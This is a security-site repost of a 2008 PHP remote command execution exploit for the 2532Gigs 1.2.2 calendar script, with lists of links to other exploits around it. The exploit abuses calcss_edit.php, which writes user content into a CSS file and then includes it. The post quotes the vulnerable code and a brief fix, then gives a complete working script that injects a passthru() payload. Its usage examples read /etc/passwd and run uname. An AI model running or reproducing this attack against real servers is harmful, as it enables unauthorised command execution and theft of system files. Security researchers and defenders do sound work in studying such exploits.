首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 2532Gigs 1.2.2 Stable Remote Command Execution Exploit 来源：staker[at]hotmail[dot]it 作者：athos 发布时间：2008-12-19   <?php /* ---------------------------------------------------------------- * 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit * ---------------------------------------------------------------- * by athos - staker[at]hotmail[dot]it * works regardless php.ini settings * http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1 * ---------------------------------------------------------------- * Code Details (calcss_edit.php) *  * 1. <?php * 2. ... * 12. sleep(2); * 13. $id = $_POST["id"]; * 14. $content = $_POST["content"]; * 15. //lets write the updated CSS file * 16. $filename = "css/calendar.css"; * 17. $theText = stripslashes($content); * 18. $data = fopen($filename, "w"); * 19. fwrite($data,$content); * 20. fclose($data); * 21. // display the new css file * 22. include("css/calendar.css"); * 23 ?> * ---------------------------------------------------------------- * Fix * * <?php * * if(eregi('calcss_edit.php',$_SERVER['PHP-SELF'])) * { *      die("Access Not Allowed"); * } * * ... * ?> * */ error_reporting(0); $host = explode('/',$argv[1]); $exec = $argv[2] or usage(); $sock = fsockopen($host[0],80); $post = "content=<?php passthru('{$exec}');?>"; $leng = strlen($post); $data = "POST /{$host[1]}/calcss_edit.php HTTP/1.1\r\n".         "Host: {$host[0]}\r\n".         "User-Agent: Lynx (textmode)\r\n".         "Content-Type: application/x-www-form-urlencoded\r\n".         "Accept-Encoding: text/plain\r\n".         "Content-Length: {$leng}\r\n\r\n{$post}\r\n\r\n"; fputs($sock,$data); while(!feof($sock)) { $html .= fgets($sock); } fclose($sock); echo $html; function usage() { print_r(' ------------------------------------------------------- 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit ------------------------------------------------------- by athos - staker[at]hotmail[dot]it works regardless php.ini settings Usage: php xpl.php [host/path] [command]        php xpl.php localhost/cms cat ../../../etc/passwd        php xpl.php localhost/cms "uname -a"        '); exit(0); } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Avahi < 0.6.24 (mDNS Daemon) R ·Microsoft Outlook Express DoS ·MyPBS (index.php seasonID) Rem ·Lizardware CMS <= 0.6.0 Blind ·ReVou Twitter Clone Admin Pass ·Phoenician Casino FlashAX Acti ·OneOrZero helpdesk 1.6.*. Remo ·PHP python extension safe_mode ·Microsoft SQL Server sp_replwr ·Linksys Wireless ADSL Router ( ·Realtek Sound Manager (rtlrack ·CoolPlayer 2.19 (Skin File) Lo   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved